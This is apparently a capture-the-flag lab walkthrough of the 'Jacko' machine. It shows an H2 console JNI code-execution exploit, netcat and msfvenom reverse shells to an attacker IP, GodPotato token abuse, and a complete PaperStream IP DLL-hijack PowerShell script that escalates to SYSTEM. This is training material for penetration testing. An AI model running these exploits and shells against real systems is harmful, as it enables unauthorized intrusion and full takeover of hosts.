Jacko

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.137.66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 21:04 EST
Nmap scan report for 192.168.137.66
Host is up, received echo-reply ttl 125 (0.26s latency).
Scanned at 2025-11-11 21:04:04 EST for 208s 
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect) 
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125
7680/tcp  open  pando-pub?    syn-ack ttl 125
8082/tcp  open  http          syn-ack ttl 125 H2 database http console
| http-methods: 
|_  Supported Methods: GET POST
|_http-title: H2 Console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
9092/tcp  open  XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
<snipped>
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>

HTTP (80):

If we opened that with firefox:

Only a static web page with html endpoints indicating this is an H2 database.

HTTP (8082):

Lets browse to that port:

We can see here is the dbms itself, and it is misconfigured that is why we can view it.

If we clicked on connect:

We will be able to connect successfully.

From here we can do various things, read files, write files, execute system commands depending on some conditions.

Read win.ini file with read_file function:

Now I searched for ways to execute system commands and found many blogs talking about creating an alias of the exec method then execute commands, but non of those worked for me:

It throws an error talking about it can not run the java compiler.

I searched with searchsploit again:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]                                                                                                                      
└─$ searchsploit h2 database                                                                                                                                                
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path                           
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
H2 Database - 'Alias' Arbitrary Code Execution                                                                                            | java/local/44422.py             
H2 Database 1.4.196 - Remote Code Execution                                                                                               | java/webapps/45506.py           
H2 Database 1.4.197 - Information Disclosure                                                                                              | linux/webapps/45105.py          
H2 Database 1.4.199 - JNI Code Execution                                                                                                  | java/local/49384.txt            
Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow                                                | multiple/remote/31010.sql       
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

The first 2 have the same queries I mentioned above.

Exploitation:

Lets mirror the fourth one:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ searchsploit -m java/local/49384.txt
  Exploit: H2 Database 1.4.199 - JNI Code Execution
      URL: https://www.exploit-db.com/exploits/49384
     Path: /usr/share/exploitdb/exploits/java/local/49384.txt
    Codes: N/A
 Verified: True
File Type: ASCII text, with very long lines (64895)
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Jacko/49384.txt

H2 Database 1.4.199 - JNI Code ExecutionExploit Database

Read it:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]                                                                                                                      
└─$ cat 49384.txt                                                                                                                                                           
# Exploit Title: H2 Database 1.4.199 - JNI Code Execution                                                                                                                   
# Exploit Author: 1F98D                                                                                                                                                     
# Original Author: Markus Wulftange                                                                                                                                         
# Date: 28 April 2020                                                                                                                                                       
# Vendor Hompage: https://www.h2database.com/                                                                                                                               
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199                                                                                                                           
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html                                                                       

# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler

-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),<nsipped>,'"'), 'ISO-8859-1', '', '', '', '', '');                                                                         
                                                                                                                                                                            
-- Load native library                                                                                                                                                      
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";                                                                                                         
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');                                                                                                                    
                                                                                                                                                                            
-- Evaluate script                                                                                                                                                          
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";                                                                                                 
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');

Those queries as mentioned will write native library, then load it, and finally we can execute system commands.

Lets do that:

Load the library:

Try to execute whoami:

Here we have command execution.

Now lets get a reverse shell, but first I need to figure out what ports it can reach:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:43:47] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:47] "GET / HTTP/1.1" 404 -

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.137.66 - - [11/Nov/2025 21:43:58] code 404, message File not found
192.168.137.66 - - [11/Nov/2025 21:43:58] "GET / HTTP/1.1" 404 -

It seems to be it can reach not only the open ports that we discovered with nmap.

Copy nc.exe to our directory and run a python3 web server again to host the binary:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Upload it to the target:

We got an error, but if we went back to our web server:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.137.66 - - [11/Nov/2025 21:48:24] "GET /nc64.exe HTTP/1.1" 200 -

Now using that binary get a reverse shell:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49970
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>

C:\Program Files (x86)\H2\service>whoami /all
whoami /all
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files (x86)\H2\service>powershell
powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.

I will add more paths to the path variable so we can use tools such as the one I used above:

C:\Program Files (x86)\H2\service>set PATH=C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;%PATH%
C:\Program Files (x86)\H2\service>cd \Users
C:\Users>powershell
Windows PowerShell                                                                                                                                                          
Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                   
                                                                                                                                                                            
Try the new cross-platform PowerShell https://aka.ms/pscore6                                                                                                                
                                                                                                                                                                            
PS C:\Users> whoami /all
                                                                                                                                                                            
USER INFORMATION                                                                                                                                                            
----------------                                                                                                                                                            
                                                                                                                                                                            
User Name  SID                                                                                                                                                              
========== ==============================================                                                                                                                   
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001

<snipped>

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

That is the path I followed to elevate my privileges to system by upload godpotato as I did in previous boxes:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

PS C:\Windows\Tasks> curl http://192.168.45.238/GodPotato-NET4.exe -o GodPotato-NET4.exe
PS C:\Windows\Tasks> dir


    Directory: C:\Windows\Tasks


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/11/2025   6:57 PM          57344 GodPotato-NET4.exe
-a----       11/11/2025   6:48 PM          45272 nc.exe

PS C:\Windows\Tasks> .\GodPotato-NET4.exe -cmd "C:\Windows\Tasks\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.238 443"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\15d86cff-e221-4cf5-baf8-3a7020297285\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0bd8-ffff-2605-ea55deb5a91f
[*] DCOM obj OXID: 0x2b8f8d96cb49424d
[*] DCOM obj OID: 0x6c0c63dc4e4e6abb
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation 
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4084

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 50009
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>set username
USERNAME=JACKO$

C:\Windows\system32>set computername
COMPUTERNAME=JACKO

We are the machine account which is system.

After I finished the box, I found that there is another path to elevate our privileges.

Post-Exploitation:

See what programs are installed on our target:

PS C:\Windows\Tasks> Get-Package
Get-Package

Name                           Version          Source                           ProviderName                          
----                           -------          ------                           ------------                          
H2                                                                               Programs                              
Microsoft OneDrive             19.232.1124.0012                                  Programs                              
Scanner Central Admin Agent    1.04.0026.23                                      Programs                              
Software Operation Panel                                                         Programs                              
Software Operation Panel       4.5.1024                                          msi                                   
Microsoft Visual C++ 2017 R... 14.12.25810.0                                     Programs                              
Microsoft Visual C++ 2017 R... 14.12.25810.0                                     Programs                              
VMware Tools                   10.3.10.12406962 C:\Program Files\VMware\VMwar... msi                                   
Microsoft Visual C++ 2017 x... 14.12.25810                                       msi                                   
Java 8 Update 251 (64-bit)     8.0.2510.8       C:\Program Files\Java\jre1.8.... msi                                   
Microsoft Visual C++ 2017 x... 14.12.25810                                       msi                                   
Scanner Central Admin Agent... 1.4.26.23                                         msi                                   
Microsoft Visual C++ 2017 x... 14.12.25810                                       msi                                   
PaperStream IP (TWAIN)         1.42.6                                            msi                                   
Microsoft Visual C++ 2017 x... 14.12.25810                                       msi                                   
Java Auto Updater              2.8.251.8                                         msi

The vulnerable program is paperstream.

We can get its version by reading the readme file under twain folder:

PS C:\> dir "Program Files (x86)"


    Directory: C:\Program Files (x86)
                                           
                                           
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/27/2020   8:59 PM                Common Files
d-----        4/27/2020   9:01 PM                fiScanner
d-----        4/27/2020   8:59 PM                H2
d-----         5/3/2022   6:22 PM                Internet Explorer
d-----        3/18/2019   9:52 PM                Microsoft.NET
d-----        4/27/2020   9:01 PM                PaperStream IP
d-----        3/18/2019  11:20 PM                Windows Defender
d-----        3/18/2019   9:52 PM                Windows Mail
d-----        4/24/2020   9:50 AM                Windows Media Player
d-----        3/18/2019  11:23 PM                Windows Multimedia Platform
d-----        3/18/2019  10:02 PM                Windows NT
d-----        3/18/2019  11:23 PM                Windows Photo Viewer
d-----        3/18/2019  11:23 PM                Windows Portable Devices
d-----        3/18/2019   9:52 PM                WindowsPowerShell

PS C:\> dir "Program Files (x86)\PaperStream IP"


    Directory: C:\Program Files (x86)\PaperStream IP


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/27/2020   9:01 PM                CommonCOM
d-----        4/27/2020   9:01 PM                DemoMode
d-----        4/27/2020   9:01 PM                FTGPTEDT
d-----        4/27/2020   9:01 PM                PatchCode
d-----        4/27/2020   9:01 PM                TWAIN
-a----        5/22/2014   8:02 PM             72 SupportPageenu.url


PS C:\> dir "Program Files (x86)\PaperStream IP\TWAIN"


    Directory: C:\Program Files (x86)\PaperStream IP\TWAIN


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/27/2020   9:01 PM                Profile
-a----        1/28/2016  10:22 AM          11658 Licenseenu.rtf
------        7/11/2016   6:32 PM        3241739 PSIP0401.chm
------         7/7/2016   3:40 AM        3315469 PSIP0404.chm
------         7/6/2016  10:41 PM        3479268 PSIP0407.chm
------         7/4/2016  11:51 PM        3544174 PSIP0409.chm
------        7/12/2016  12:59 AM        3449511 PSIP040A.chm
------         7/7/2016   1:13 AM        3424734 PSIP040C.chm
------         7/6/2016   4:55 PM        3412543 PSIP0410.chm
------        6/21/2016   9:13 PM        3868867 PSIP0411.chm
------         7/5/2016  11:21 PM        3177961 PSIP0412.chm
------        7/12/2016   5:21 PM        3406701 PSIP0416.chm
------         7/7/2016   2:19 AM        3396546 PSIP0419.chm
------         7/6/2016  11:21 PM        3394699 PSIP041F.chm
-a----         7/4/2016   2:00 PM          17990 readmeenu.rtf

PS C:\> cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"                   
cat "Program Files (x86)\PaperStream IP\TWAIN\readmeenu.rtf"
{\rtf1\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fnil\fcharset0 Microsoft Sans Serif;}{\f1\fswiss\fprq2\fcharset0 Microsoft Sans Serif;}}
{\colortbl ;\red0\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\nowidctlpar\sl276\slmult1\f0\fs18 ---------------------------------------------------------------------------------
------------------------\par
fi Series\par
PaperStream IP driver 1.42\par
README file\par
---------------------------------------------------------------------------------------------------------\par
Copyright PFU LIMITED 2013-2016\par
\par
\par
This file includes important notes on this product and also the additional information not included in the manuals.\par
\par
---------------------------------------------------------------------------------------------------------\par
<snipped>

Search for public exploits for that specific version:

PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege EscalationExploit Database

It is vulnerable to dll hijacking.

Lets generate teh dll file with msfvenom:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.238 LPORT=443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload                                          
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll

Also copy the powershell script and paste it to a file to transfer it to the target machine to trigger the exploitation:

$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"

if ((Test-Path $PayloadFile) -eq $false) {
    Write-Host "$PayloadFile not found, did you forget to upload it?"
    Exit 1
}

# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
    try {
        [IO.File]::OpenWrite("$_\x.txt").close()
        Remove-Item "$_\x.txt"
        $WritableDirectory = $_
    } catch {}
}

if ($WritableDirectory -eq $null) {
    Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
    Exit 1
}

Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"

Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
    $client.Connect()
    $reader = New-Object System.IO.StreamReader($client)
    $writer = New-Object System.IO.StreamWriter($client)
    $writer.AutoFlush = $true
    $writer.Write("ChangeUninstallString")
    $reader.ReadLine()	
} finally {
    $client.Dispose()
}

Write-Host "Payload triggered"

Upload both the dll file, and the script:

PS C:\> curl http://192.168.45.238/shell.dll -o "C:\Windows\Temp\UninOldIS.dll"
PS C:\> dir "C:\Windows\Temp\UninOldIS.dll"


    Directory: C:\Windows\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/11/2025   7:30 PM           9216 UninOldIS.dll


PS C:\> cd \Windows\Tasks
PS C:\Windows\Tasks> curl http://192.168.45.238/exploit.ps1 -o exploit.ps1
PS C:\Windows\Tasks> dir


    Directory: C:\Windows\Tasks


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/11/2025   7:31 PM           1412 exploit.ps1
-a----       11/11/2025   7:27 PM          45272 nc.exe

As shown in the script our dll file should be placed under windows\temp folder.

Before we launch the exploit I will start a nc listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...

Run it:

PS C:\Windows\Tasks> .\exploit.ps1
.\exploit.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
  
Payload triggered

And we escalated our privileges to system:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Jacko]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.238] from (UNKNOWN) [192.168.137.66] 49791
Microsoft Windows [Version 10.0.18363.836] 
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Get the flags:

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
8fc9d562b60b3040bf3d2309c796258a

C:\Windows\system32>type C:\Users\tony\Desktop\local.txt
7e1df7f9b4eabde99ccdd51364aaf40c

PreviousAlgernon NextCraft

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (80):

hashtagHTTP (8082):

hashtagExploitation:

hashtagPost-Exploitation: